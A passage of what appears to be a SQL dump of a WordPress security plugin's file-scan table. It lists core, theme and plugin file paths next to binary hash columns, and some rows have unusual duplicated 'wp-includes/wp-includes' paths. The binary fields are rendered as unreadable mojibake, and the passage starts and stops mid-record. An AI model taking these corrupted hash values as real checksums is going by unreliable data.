{2','',0,'?'),('�Z��Q+x�r��0��','wp-includes/blocks/media-text/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��!@ŏɵB��)','�1��Ӳ\"Vx��A]R+.8�v���U3|','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��F�9��Q� ','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�\" 6A��7^�H�','wp-includes/blocks/cover/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��;%�\r�⿆��v�','L�ǏC+��$�;����0�|�|��a��m���','',0,'?'),('�7Q9gQG�^�=)�','wp-content/themes/hitmag/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q���/{ O�v','�9[��m�.��㌗2DR�L�*C�K�','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֛��Gn�/:�y��','�\noJ=�]�#�k儏�d��iVv��9���','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)p†M��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7!:�6�����D��.�','�������/X�4qD��d՜���Pz.J�','',0,'?'),('�id�^,�4�@=	��9�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/LoggerInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���>/�D�H�\r�7C�','l�L�3RN���i��Ú����V>��	 �O���','',0,'?'),('�~�S7B�1c>^�M�','wp-content/plugins/wordfence/js/admin.1647958122.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����%��$�\\v','4y�<#z�3x\'C+B��/��4Q[��<ԃ��H','',0,'?'),('���o�^�hdȥ��a','wp-content/plugins/wp-cerber/assets/flags/kr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��8sA���E���','��kB���3s�KlF�<�\'jc�q�̝�2��1�','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','맼G\ns�.��9N�','J�r6�֌)�f\r����N���CzF����','',0,'?'),('���3.�\Z�=�k_8�','wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Jp�l��b�7�','����g1���T�4BP�#�l�l�.���cLE','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6Ihm�:�t2�','�Ȣj�_G�D^�O�B7���\Z��(*s��6�','',0,'?'),('��#�dl|M�SRə','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-cache-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ն�ڌ����CE\'�','LL�c�h��n�ԵoL#M㱚H:\0\'�1�,p','',0,'?'),('����B�+�y\0x�a�$','wp-includes/blocks/table/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jxn,������X','v���3��#�Ak��g�]�r��||f�2�','',0,'?'),('�����p��A�z1w','wp-includes/blocks/navigation/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Eo�̆V@4��+��B','T��\"�\"^�|iSs�=�6�+-��\\\n�','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����IG�H^�W<�','wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɏΦ�׈3I�g3&�H','to��.�c�NȆ�n֚�����O����^�','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���ʯd&G��):���','wp-content/plugins/wp-cerber/assets/flags/la.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	r!�F�V�a\\g��tl5','5_9��j�y���b+���I8�.���)�W','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�կ���#�z_\'��+','vT��oC�G��Ng���3�?�Xm��K','',0,'?'),('��t�zےKb��:o�','wp-content/plugins/wordpress-seo/css/dist/tooltips-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�p�i��wH�]��k[','ER�h���Μ��Y�,t��VZ=w�=��	�','',0,'?'),('��� ���*1�%{�','wp-includes/wp-includes/js/tw-sack.js',0,'��������9>���','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xX��C��\0(\n�Gg\n','P��@�Fo�I��\r�)C)w�\"]�\'�ة-','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('�Km)�&c�7�9!�a','wp-content/plugins/wordpress-seo/lib/migrations/column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�`_^>뻪Ӽ?��','���?�>b�J@�q��Gz��~ӄ��u��a�','',0,'?'),('�[��q|�O)0<���','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԛ𔷞���\\:o��','gn���\n�^�ў�GT\'4z{}�#�GD��{','',0,'?'),('�  ��g����%�!�','wp-includes/blocks/site-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�� 2�_��lu\0�%','STֳ�^j��	쉆�^g�r�C���uK�\nİ','',0,'?'),('� �&?�F�ZiE�Od','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��c�K=�G^e�','�*/G�i�ю�ķ\'�&�c�\0,ޚ�� s�6)','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�$>G����*_���','��o\"p\'�r-�ͥS�I�H�q�nya����M','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�}?{G��j�eGi�','eg��v��\Z�x��!�74��F�\n�����D�','',0,'?'),('�74���5��Zw^�b','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/post-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z�Na��;Y�t�<�t','�p�h�0��5h�]}�5p��	���@�ۮ��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0k��E�.К�a#',' ,�w>M�?%9,�H�b����ץ*�\'�','',0,'?'),('�GP�)4��烛�ѳ','wp-includes/wp-includes/class-wp-fatal-error-handler.php',0,'����-����v�','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�;�0�8H4i���o','�N\r^�p|��T�ALM���e������','',0,'?'),('�_� ��6T���NG?','wp-includes/blocks/search/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yV��D=�1����v\'�','†7�ߌ�\r��_;�\nx׵���׫�<��','',0,'?'),('�`�o��.QS��`�','wp-includes/blocks/image/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����N��$	','D��F7�;��50Z��9���j��ٛ��K	','',0,'?'),('�hR�\Z�u�B����','wp-content/themes/twentytwentythree/styles/pilgrimage.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jz7Λ�n6�{f�[l�&','\0��I%���.!4C�S�[%�O{�?Q���,','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9`ה�̯�•��','��`�����a�C���N�}�ڠ.�ł���','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���I>��_�@�\"�','�I�0�L\0��\r\'�}��g`��z _(���%','',0,'?'),('���nQ#��\r��v;%�','wp-content/plugins/wp-cerber/assets/flags/ma.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]KYe3؋�r:x�	�','��d	ը�c�º	�:���C��K̓n���Ū�','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('���s��c��ˠ|�9','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/sr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9J{�K�Ӵ�\\]R�h','�+��UX�qcQ�/2O&�q;��zaC���#�}','',0,'?'),('�����nJ-2���5W�','wp-includes/blocks/rss/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@Pt\r2/��p_i��','��MJ���\\�7����*r;����P��6c','',0,'?'),('����I��t���hر','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/closure.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ظߤUT�~Ȭbn��N�','ɢ|_{���=��ԁxtj`>�ML�0�0�t','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('�������2��f','wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php',0,'���b5lJ�#���v','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���iQ��$�g��Fr','�M�=�cS��~[\r�<�)ǖ�3O{�xھ\0�w','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��v�(����Mm��4','v�m>�y��߸�d�� 0��|�n�4M�9�r','',0,'?'),('���a��\Z׊If�8R�U','wp-content/plugins/wordpress-seo/src/generators/schema/third-party/events-calendar-schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?b���.�	L��6','vҠ?�>��c��]�NA$�0�5��B��\r�C!h','',0,'?'),('��V�Z�8�=�v���c','wp-includes/blocks/freeform/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��\n����F�͛�','�680�2f~�0��\\!��h�nBQf\'�','',0,'?'),('��ڸP���ֺb�','wp-includes/blocks/social-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_o���\'���	��\'��\n','�w.�<����.�.CWH2��k3n=���߆','',0,'?'),('��ᨢR��]�K��|z�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/log/Psr/Log/InvalidArgumentException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�||EW|U\rIfa쎗L','s�)��LM\Z(�����F��u؟8Y+x','',0,'?'),('��pg�nfՃ��:�','wp-includes/wp-includes/class-wp-block-supports.php',0,'}��C��ie�4���','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-Mdt��1OY�','\'Îł:e�؅��Q����o]���y','',0,'?'),('�!q[-n\rN��m7���','wp-content/plugins/redirection/api/api-export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ON[f}�	㥣��\\�','R	�����7\"\n� ��Z:��K��s��1��\Z@','',0,'?'),('�8\Z�� �-L۷�=�','wp-includes/wp-includes/js/jquery/ui/core.min.js',0,'I�g{����!�S{5�','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�=��T�O��7\r�7�{','wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��- ����D�����','�7ݰ��q͊�����C�L�wI㎘|���Y','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�;\"����[ʌ�W�','si?�B\r��F[r���\"��MR٤���V |�','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�W�X�-��\\Q.�e�','wp-content/plugins/wp-cerber/assets/flags/bj.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��M�xK&_Zq}�','ٵ}��}�u�?�\n6�m�X�����h�Ö�^','',0,'?'),('�W�	ǂ����g��/�','wp-content/themes/hitmag/inc/kirki/modules/tooltips/class-kirki-modules-tooltips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƌ�4�$�:S�Z���','7��ȼ�T!��`��Z��3�H��i62�#','',0,'?'),('�k\0���V�&c��뀻','wp-includes/wp-includes/customize/class-wp-customize-selective-refresh.php',0,'[��`�`b�=E�\"','[��`�`b�=E�\"','䖌B�%�\'�M�9F���4\n��4yө�\n','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�s.�V!���Xtãs�.','wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���̖0i��V�҇�','&%˴��t�E;V���s���%�+2��I�jZ','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('�z�v��~��ZGL�8','wp-includes/wp-includes/revision.php',0,'Pق�g�OVjX�����','Pق�g�OVjX�����','�4k�B�3S��������\"���\ZBG�ǎ\0KV','',0,'?'),('���p�v�ӛ��z �','wp-content/plugins/wp-cerber/assets/flags/cf.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����5�榐�v�C�','r�}#�\\�\"f]�H-�TF��X��!I�Ϟ%','',0,'?'),('����v�r@�{�c{','wp-includes/blocks/social-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�K�&e����\rAnc','\Z�[��(�&�+%�T�Fg�\n�������g��','',0,'?'),('���4�f��G��AZ%','wp-includes/class-wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ò�L6Gia������t','�/�]���Zlq�(�`w\"ꌻ��4��)�','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dp�Q_�Ga�\0R','�i��0oW��!n��7`R�Hbd�%y��5L�=','',0,'?'),('��¼c���5����','wp-content/plugins/wordpress-seo/src/surfaces/meta-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','È�v�P�5�q�f��$','�;���̊=@k%��f��єl�2�kA�','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('�� �Gg��=4u��','wp-content/plugins/wp-cerber/assets/flags/dk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&>���S��g�7����','���~J��t>m�\n}E!���&��','',0,'?'),('��35n�o�~.���','wp-includes/blocks/archives/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��Ǟs[��p��O\'�','*������z���tRM�R�^/���cΟ�','',0,'?'),('�߫����P%��D��','wp-includes/class-wp-dependencies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N����g�-��Z�','2=@M�D��3�v�M�A�}�v�S\'/3.m','',0,'?'),('���k/A�� �ā�','wp-includes/wp-includes/class-wp-network-query.php',0,'G��R�~|8�Z��1[�','G��R�~|8�Z��1[�','��Z[�JM��D�Ң\n�*Ұ�k�+���:','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ǜ�R�۬eao2)Z','�H��\r�h�M`/4�5�0V���>��5�U�B�*','',0,'?'),('��!�$��(bO-�&�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eS��&C��E�\rZ(���','�m~/0�SP����8�]W���6�����T�~','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_ba������\'X&T�','�\\�-]���E�d(��1NU�2p��W�[s!','',0,'?'),('� �x�k���&Dx','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|SA��s��(���ω','��%g�X��2p��3އ���i��0_��ts','',0,'?'),('�2��	�ܚDSX�\Z�','wp-includes/wp-includes/js/jquery/suggest.min.js',0,'s\\+A)���n.;��','s\\+A)���n.;��','I<�{\04�`��<!j��Z8돲��D�HW��','',0,'?'),('�<�͐n�oz#�?:','wp-includes/blocks/widget-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Fi5�y@6\Z���9U','��-��~��(�I\Z���r�j�,`rvv�&\\��','',0,'?'),('�?��&�,w��e�<\Z','wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���eG.�m(P�Z','�W�<˝׻����dq�ܬ��\'�.�H�GMS��','',0,'?'),('�F#	��{O6yl�]S�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ol��=R�~���}���','c�\Z#za���\Z<�Ӊ:�`��W\'J;�R�L','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڪQA��nYgn�g��',' �$�y�J�^�I#�7�#�2��$6��HǞ�','',0,'?'),('�U��z��c��p��','wp-includes/blocks/separator/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QHOM�W��Y\0�Q�','UU�-����V8�\n�	��p�P��Z��S�','',0,'?'),('�_���G��h@�ڌ�X','wp-content/plugins/wp-smushit/app/assets/images/updated/updated.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9D`�tR�EuiI�\"','YHH�)�A�g�}%O��I�@U�K\"�i�@<q�U','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\0F|e�ܑ��E��*','�[�]��[�n��Py��<QC̴	','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('�����R�\\�p��”','wp-includes/blocks/comment-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`?ogI5�좈�e','�Y�Q��Ǘ	}ЭK�<.�<����b+��T','',0,'?'),('�����X`��`��N','wp-content/themes/hitmag/inc/kirki/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[_���P>�@�\r�,','}�wV�6>��h.zٰ����o��;x��','',0,'?'),('��[�6��dcHa ','wp-includes/blocks/latest-posts/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E鐃Pl0��O$A','��JBiv��}$:�)���t�\"���\0�0�x�','',0,'?'),('��\\���֯�B!��a�V','wp-includes/blocks/comment-content/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\&ޭ<�c�{�\0�SN�','df\"D�m��Z�=@��x��7��2JBu','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xh�+t�\r\r/��A�','�\\mN���톬3��oE�\0�Z��)�y�B','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('�͓*I�6�D��Y��','wp-content/plugins/wordpress-seo/images/support-team.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��Zi7A�^?^>�@�','��C�1��^�U8�Mc��ܶ7F��9k�x','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�a�Rd��\\�T','3�����$ׁʌe����}K�+\"~y�``�','',0,'?'),('�ج|tRe-�.h�ǛT','wp-includes/wp-includes/js/wp-pointer.js',0,'��8\Z߁@ \r�|�ɛ[d','��8\Z߁@ \r�|�ɛ[d','��O�Ȇm~����gƷ^96��}>|̭/�]��','',0,'?'),('��-���M�L{?o�','wp-content/plugins/wp-cerber/assets/flags/sm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~fK�N��黃��','�X�Ӷo�!�#>��(���Ԙ���l�]\Z�g','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�E=����Sy?�','Ƚ-M9h����z\Zl:���ۮ6Ł��\rb','',0,'?'),('��U�]R���)Y��m','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�j����0�����9','��\Z�Ҩ2�#��s:�Р\n		v��Ø+l�','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('�\nkc��\r�Q�j�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Each.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1|]�e�@�2��f�','�/e������|_P�O�ƪIx��˺�]��ϝ�','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�&‡��L��]�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�&\ZtR.�Ϳ\r�TTF','wp-content/themes/hitmag/inc/kirki/assets/images/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��tw|茇^��\r�<K','d�^2?P���F��~���>����ݾ��m','',0,'?'),('�=}2�D߶�Q��\n�','wp-includes/wp-includes/css/dist/block-library/common-rtl.css',0,'#�D�P�y��n�\\B�','#�D�P�y��n�\\B�','�AQY��tQ�aK	hˤ�+\r�+�x,`⵽�','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I���+(�A��;�','K�7���2�0�W��2f�i��oksc���-��c','',0,'?'),('�Gd�d́�����`�w','wp-includes/assets/script-loader-react-refresh-runtime.min.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f\ZZ�BH�=?3!R','��wW�k���(\0LJ��m�����؟\\g4','',0,'?'),('�UD�Ğ�;��(Ǩl','wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Z=�x���}��Uu�','���kj	�ifm~�[�9�2�^1��j߰!/','',0,'?'),('�X\rj�l:;���hܯ�','wp-content/plugins/wordpress-seo/css/dist/metabox-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-3��-�(�ño�	','N��@LL���o�~[.u���Ӛ\\����*�7\n','',0,'?'),('�wB~~�����BP�8','wp-includes/blocks/post-date/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����٦>�L�\'','����?��a�h����Ɩov���